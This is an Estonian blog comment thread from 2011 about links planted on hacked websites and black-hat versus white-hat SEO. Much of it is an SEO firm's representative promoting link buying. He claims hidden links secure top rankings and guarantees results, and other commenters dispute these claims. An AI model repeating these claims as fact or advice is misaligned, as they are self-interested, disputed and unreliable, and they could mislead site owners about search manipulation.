          Tuleb aru saada, et kavalad kurjategijad kasutavad igasugu kohti, kus netis mingi ost-müük toimub, lingibörsid kaasaarvatud. Isegi online aktsiabörsides on palju kurjategijaid. Teatud mõttes on olukord aktsiabörsides ja lingibörsides sarnane – mõlemas kohas kasutatakse aktiivselt automatiseerituid maaklereid ja kurjategijad kasutavad seda asjaolu ära, luues kunstlikult olukordi, et panna ausate inimeste maaklerid-robotid nende “kraami” ostma.
          Optim Technology teeb aktiivset koostööd nii politsei, kui ka kuritöö ohvritega, kuigi üldiselt meie eriti aidata ei saa – pöörduda tuleb eelkõige börside moderaatorite poole, kuna ainult neil on olemas konkreetsed andmed rikkujate kohta.
          Ma veidi uurisin asja – lingibörsides on olemas lihtsustatud protseduur, mis võimalda ilma juristi abita tõestada Teie kui kodulehe omaniku staatust ja seejärel saada kogu info isikust, kes teenis raha läbi linkide müügi Teie lehel.
          Peale sellele pakub 
          börs
          2 võimalust – kas blokeerida koduleht börsis või suunata sellest saadav tulu Teie kui kodulehe ametliku omaniku taskusse. Seda viimast võimalust soovitan kindlasti kaaluda – tihti on kurjategijad teinud läbi suure töö, et saada maksimaalset tulu linkide müügilt Teie kodulehel. Seega mõnikord on mõtekas jätta lingid alles ja suunata kogu rahavoog oma taskusse :)  Siiski ei tasu kombineerida linkide müüki lehel ja sama lehe promomist SEO abil. Aga kui leht “ripub” netis niisama ja ei oma Teie jaoks tähtsust reklaamikanalina – siis on linkide müük täitsa okei viis lisatulu teenimiseks.

          • Aivar Optimist
            Lisatud 31. okt. 2011 kell 22:54 | Püsiviide

            Ja veel üks kommentaar, sorry et koorman pikkade tekstidega.
            Nimelt pretensioonidele reageerimise seisukohalt on  
            minu
             tähelepanekute järgi nii, et mida suurem firma, seda rohkem ta JOKK-värgi selja taha poeb.

            Näiteks, Optim blokeeris lasva.ee lehe kasutamise reklaamipinnana niipea, kui esimese kaebuse sai.  Samuti
            Optim
            püüab   “halbade lingikeste”
             probleemiga  võitlemisele igati kaasa aidata. Täpselt samuti käituvad ka lingibörsid.

            Optimil on olnud kogemus, kui tundmatud kurjategijad müüsid oma kodulehel nö “konfiskeeritud” fotokaameraid ühe meie kliendi firmanime all.
            Meie klient sai kaebusi, et miks “tellitud” fotokaamera pole kohale jõudnud, ja sama palju küsimusi, et kas pakkumine on reaalne?
            Kurjategijate koduleht asus hostingul GoDaddy – kirjutasime neile, esitades tõendid, et meie kliendi firmanime all tegutsevad pätid. Selle peale saime viisaka copy-paste vastuse:

            As a hosting provider, we cannot be expected to judge the alleged illegal activities you have mentioned. However, we are more than happy to quickly comply with any court-issued order, or official request by law enforcement (whose burden it is to determine the existence of illegal activities). We regularly work with courts and law enforcement from the local to the international level. As a result, we would recommend you seek an injunction from a court as the most efficient way to handle this situation.

            Las lugeja osustab ise,  keda antud loos demoniseerida ja keda mitte…

      • Aivar Optimist
        Lisatud 27. okt. 2011 kell 18:02 | Püsiviide

        Jah, ma tõepoolest võtan kogu elu SEO-keskselt. Siinkohal ei saa vastu vaielda – see on minu tugevus ja nõrkus! Samaaegselt :)

  7. Aivar Optimist
    Lisatud 27. okt. 2011 kell 00:37 | Püsiviide

    Rootsi SEO konkurssi linki tuli viga sisse, vabandan.
    Korrektne link:
    http://www.sokmotoroptimering.nu/svenska-mästerskapen-i-seo-2011

  8. Aivar Optimist
    Lisatud 27. okt. 2011 kell 00:43 | Püsiviide

    Ikka vigane link! Peeter, Sinu tehnokratt.ee ei toeta täpitähti linkides vä? C’mon!
    Ühesõnaga: http://www.sokmotoroptimering.nu/
    Sealt leiate kogu info konkurssi kohta!

    Üpris lahe tsitaat sealt (masintõlge):
    Black hatred is allowed and I do not want to get involved with this, can I join anyway?-Of course. If the contributions to the competition uses both white hat and black hat then we also see how good the white hat can compete when it really counts.

  9. Lisatud 27. okt. 2011 kell 09:51 | Püsiviide

    Superrahul teemapüstituse ja diskussiooniga!

  10. Jaak Ennuste
    Lisatud 27. okt. 2011 kell 12:32 | Püsiviide

    Minu kogemus näitab seda, et Google on igasugu linkspämmijatest alati 1-2 sammu ees. Seal töötavad pagana nutikad tüübid. Igasugune black-hat SEO teenuse ostmine on lühiajaline rahapõletamine.

    Pikaajalise ja püsiva hea otsimootoripositsiooni saavutamine eeldab ikkagi white-hat meetodeid. Loomulikult kuulub selle alla ka linkbuilding, mis on üks mõjusaimaid. Aga kogu saidi kvaliteet on tähtis. Ja justnimelt kvaliteet, Google saab erinevaid statistilisi meetodeid kasutades aru, kui su tegevus oma saidil pole tavaline.

    Meie oleme teinud mitmeid edukaid SEO projekte, rahvusvahelisel tasemel tõstnud ettevõtteid top-fold’i. Ja ainult valgete meetoditega. See pole black-hat mitte vältimatus vaid ajutine doping.

    • Aivar Optimist
      Lisatud 27. okt. 2011 kell 18:54 | Püsiviide

      Googleis töötavad nutikad tüübid – nõustun 100%!
      Samas “hallid” meetodid nagu linkide ostmine on andnud häid tulemusei vähemalt 6 viimase aasta jooksul. Vähemalt niikaua olen mina selles valdkonnas tegutsenud ja  kogu see aeg on linkide ostmine olnud efektiivne. Enamgi veel – pikaajaline link-building on olnud kõige paremaks strateegiaks – vastavalt mõningatele SEO-teooriatele Google peab “naturaalseteks” kõiki linke, mis on vähemalt 2 aastat vanad. Uute filtrite rakendamisel Google võitleb eelkõige uustulnukatega, samas “vana kooli mehed” püsivad headel positsioonidel isegi “kahtlaste”, kuid soliidse vanusega linkide abil. Seega Eesti tingimustes – kus hetkel on Googlei filtrid nõrgad, kuid pikemas perspektiivis võib oodata USAs kasutatavate filtrite sissetulekut – võin soovitada link-building teenuse sisseostmist (näiteks Optimilt) ja selle pikaajalist kasutamist. Samas tuleb vältida igasugu rikkumisi Teie kodulehel  – selle eest Google karistab, väliste viidete eest aga mitte.

      Kodulehe kvaliteet on tähtis – nõustun 100%! Nagu ma juba eelnevalt mainisin, Google – puht tehniliselt – suhtub kvaliteetsete kodulehtede promomisse liberaalselt, isegi kui need lehed kasutavad “keelatuid” väliseid link-building võtteid. Samas ebakvaliteetsete kodulehtede positsioonid langevad, kui Google’i poolt teostatud kasutajate käitumise analüüs näitab, et lehed ei paku kasutajatele huvi. Ja isegi kvaliteetsed lingid annavad ebakvaliteetsete lehtede promomisel vaid ajutise efekti!

      Google on lingispämmijatest 1-2 sammu ees? Jah, seda kindlasti, kuid Optim Technology SEO labori analüüs näitab, et isegi nähtamatud lingid tagavad TOP10 positsioone. Kas Google ei suuda tuvastada nähtamatuid linke? Tehniliselt on see lihtne, suudab küll kui tahab! Samas Optimi ja mitmete sõltumatute spetisalistide poolt teostatud SEO-eksperimendid näitavad, et isegi ostes ainult nähtamatuid linke, on TOP10 positsioonide saavutamine võimalik. 

      Miks Google siis arvestab neid linke? Põhjus on lihtne: kuigi Google ametlikult ei poolda lingispämmi, samas ta ikkagi võtab neid linke arvesse. Google’i põhiline ülesanne on tagada otsingutulemuste kvaliteet. Paraku on Google’i võimed info analüüsimisel piiratud, robotil on raske aru saada, milline koduleht on kasutajale kasulik ja milline mitte. 
      Seega Google kasutab kavalat võtet – võtab arvesse kõik kodulehele viitavad lingid, k.a. “nähtamatud”, seejärel näitab kodulehte otsingu esikohtadel ja analüüsib kasutajate käitumist.
      Kui analüüs näitab, et koduleht on kasutajate jaoks huvitav, siis TOP10 positsioonid püsivad!

  11. margus
    Lisatud 27. okt. 2011 kell 13:03 | Püsiviide

    “Eesti Riik on langemas rahvusvaheliste korporatsioonide mõjuvõimu alla. Eesti ajakirjanduses on viimasel ajal hoogu võtmas ohtlik tendents, et rahvusvaheliste korporatsioonide poolt sätestatud soovituste mittejärgimist on hakatud nimetama “rikkumisteks”! See on ohtlik tendents, mis võib viia selleni, et meedia hakkab varsti süüdistama kodanikke  mõne karastusjooke tootva rahvusvahelise korporatsiooni soovituste “rikkumises” või rahvusvahelise rämpstoidurestoranideketi soovituste “rikkumises”. Aitab! Eestlased on vabad inimesed!”

    kulla optimistist Aivar, loe nüüd see väljavõte veelkord läbi ja pea veidi aru…
    @petskratt:disqus nagu ma näen, pole Sa seda ammust ÄP IT-topi asja endiselt unustanud? ;) Ning tore on siit blogist jälle midagi asjalikku lugeda!

    • Aivar Optimist
      Lisatud 27. okt. 2011 kell 18:07 | Püsiviide

      Margus, minu juttu ja kogu seda “lingikeste teemat” peabki võtma huumoriga! :)

  12. Aivar Optimist
    Lisatud 27. okt. 2011 kell 21:41 | Püsiviide

    Kui kellelgi on küsimusi Optimi meetodite kohta või Googlei otsingutulemustega manipuleerimise kohta üleüldse, siis Optimi peainsener Aivar on valmis nendele küsimustele siin vastama! Küsige julgelt!

    Kui soovite privaatset konsultatsiooni, siis saatke kiri aadressile [email protected]

    • Aske
      Lisatud 27. okt. 2011 kell 21:51 | Püsiviide

      Mul on küsimus SEO eksporteerimise kohta) Ehk kuidas läheb teistedes riikides, näiteks Soomes. Kas konkurents on samasugune nagu Eestis? 

      • Aivar Optimist
        Lisatud 27. okt. 2011 kell 23:01 | Püsiviide

        Soomes on SEO konkurents äärmiselt madal, ehk isegi madalam kui Eestis.
        Ükskõik mis kodulehe saab
        tõsta
        TOP10 hulka ükskõik mis märksõnaga umbes ühe kuuga.
        Soome ettevõtete huvi SEO teenuste vastu on miskipärast suhteliselt madal. Rahulik unine turg :)
        Samas vastavalt uuringule “The comScore 2010 European Digital Year in Review” on Soome puhul näitaja “Searches Per Searcher” kõrgeim Põhjamaades! Ehk siis soomlased on aktiivsed Googeldajad.

        Ühesõnaga, olukord Soome Googleis on EESTI firmade jaoks ülimalt soodne ja seda võimalust tasub kasutada. Optim Technology saab aidata esikohtade saavutamisega Google.fi otsingus.
        Teine easy turg on Norra, Google.no otsingus on lihtne esikohti saavutada, kuid rahvast liigub Google.no otsingus ikka vähem kui Soomes.

        Rootsi ja Taani puhul on Optim Technology puutunud kokku tugeva kohaliku konkurentsiga ja aktiivse “gray hat” kui mitte “black hat” link-buldinguga, kuid üldiselt suudame garanteerida positsioone ka nendel turgudel.

        • Aske
          Lisatud 28. okt. 2011 kell 07:41 | Püsiviide

          Vaatasin teie teenuseid, et te pakkute põhimõtteliselt ainult SEO’t. Miks? Paljud täna liiguvad suunasse, et pakkuda rohkem komplekset teenust: SEO+Adwords+SMO+eposti turundus+koduleht. Et kas ei ole tekkinud probleeme sellega, et mõned kliendid loobusid teie pakkumisest selle pärast, et te ei pakku adwordsi või masspostitust?

          Ja te ütlesite, et “TOP10 positsioonide saavutamise edukus 95%.”. Mis toimub 5 protsendiga? konkurents on tugev?

          • Aivar Optimist
            Lisatud 28. okt. 2011 kell 22:36 | Püsiviide

            Alustades biznisit paar aastat tagasi, pakkusime mitmeid erinevaid teenuseid korraga.
            Kuid lõpuks jõudsime järelduseni, et klientide jaoks on huvitav eelkõige TOP10 positsioone garanteeriv SEO teenus. Ja välisturunduse puhul ilmnes, et “tavaline” internetiturundus nõuab ikka kohaliku keele ja kultuuri tundmist, samas “lingikeste” abil saab lehti promoda ka ilma keele valdamiseta :)

            Suur osa Optimi klientidest ei telligi meie teenust otse, vaid läbi müügipartnerite – veebistuudiod, reklaamiagentuurid jne. Agendivõrgustiku laiendamine on meie jaoks praegu prioriteet N1, eriti Põhjamaades. Optimil on veidi teine ärimudel, kui “tavalistel” internetiturundajatel.

            Kui mõni klient soovib AdWordsi, SMOd vms, siis saame suunata sellise kliendi mõne partneri poole, kellega on Optimil sõlmitud koostööleping.

            Mis toimub 5 protsendiga? Noh, enamasti on probleemiks promotava kodulehe madal kvaliteet, tekstide puudumine jne. Sellistel juhtudel koostame vastavad soovitused. Need kliendid, kes meie soovitusi järgivad, varem või hiljem ikkagi tõusevad TOP10 positsioonidele.

  13. Aske
    Lisatud 27. okt. 2011 kell 22:00 | Püsiviide

    Linkide ostmine see on ju lailali levinud praktika.
    Kui keegi mõtleb, et linkide ostmine on minge NO-NO SEO’s ja ta tegeleb puhtalt valge SEO’ga siis see on naljakas. Võiks öelda, et täna kõik tegelevad minges mõttes Black SEO’ga kellel on olemas linkbuildingu punkt lepingus. See on ju >>kunstlikult<>kunstlikult<< tõsta veebilehe.  

  14. Anonüümne
    Lisatud 7. nov. 2011 kell 13:25 | Püsiviide

    Ma usun, et keegi siit ei ole nii naaivne, et usuks
    seda juttu Optimi Black Hati nn riskivabast kasutamisest, tegelik tõde on
    kergelt vastupidine. Seega ei hakka selle teemal kauem peatuma aga rääkida tahaks küll Rootsi turu suunas teele lastud väidetest.Ei ole mõtet ikka lihtsalt täiesti umbmääraste väidetega ka välja tulla.  Tundub, et ega vist Optim väga ikka sellest Rootsi turust midagi ei tea. Härra
    Aivar, et üldsegi ka mida sa siin viitad? Rääkisin just Magnus Brathiga, kelle
    poolt on loodud sinu viidatud http://www.sokmotorkonsult.se/.
    Tutuvustasin natuke olukorda ja sinu väiteid ja üllatus-üllatus ta ei tahtnud
    kuidagi nende Rootsi turu väidetega nõustuda. Ei nii Magnus Brath, ei sokmotorkonsult.se
    ega ka ülejäänud Rootsi SEO spetsialistid EI KASUTA KLIENTIDE PUHUL xRumerit
    ega muidu hämaraid linkide ehitamise meetodeid. Ülejäänud lugejatele
    teadmiseks, et viidatud artikkel kirjeldab linkide ostmis (mitte spämi linkide)
    ja räägib üldiselt kuidas webmasteritega ja blogijatega kontakteeruda
    partnerlus eesmärgil linkide ostmisega vms ning see on neutraalselt kirjutatud
    artikkel, mis on osa Magnuse SEO kooli materjalidest, mis sisaldab ka
    informatsiooni sellest kuidas raporteerida spämi ja ostetud linke Google’ile. Tundub, et keegi siin ei suuda eristada, mis vahet on linkide ostmisel ja
    linkide ostmisel.

    Küsisin ka veel Jim Westergreniga infot juurde, kelle puhul saab öelda, et kui
    peaks valima tõesti Rootsi SEO ristiisa, siis oleks see tema. Ta omab SEO
    foorumit http://www.seo-forum.se/ (mille
    puhul võib julgelt öelda, et see esindabki Rootsi SEO kogukonda). Ka Jim kinnitas, et Rootsi SEO spetsialistid ei kasuta Black Hati klientide puhul ja
    see on ka väga taunitav Rootsi SEO kogukonnas, rääkimata siis xRumerist. Mis
    puutub xRummeri näitesse sokmotoroptimering.nu puhul, siis selle omanik David ei müü
    minu ja ka Magnuse teada üldse SEO teenuseid. Seega, kuidas saab sealt
    paralleele tuua kogu Rootsi turul müüdava SEO olemusega, seda taipab vist
    ainult Optimi loogika.

    Lisaks veel küsimus Optimile, et mida see spämmi linkide nn kontroll http://optim.ee/lingid/ peal peaks tavalisele veebi omanikule näitama?

Üks trackback-viide

  • Kirjutas Arvuti turvalisus | Joonas Allemann 6. nov. 2011 kell 21:27

    […] Esimene mis mulle meelde tuleb on “Pealtnägijas” näidatud Lasva valla kodulehekülg millele olid valla teadmata tekkinud viidet pornolehtedele. Õppida oleks sealt ilmselt kodulehtede omanikel/haldajatel, et oma lehti ja nende koode tuleks vahest kontrollida. Pikemalt on sellest juttu siin. […]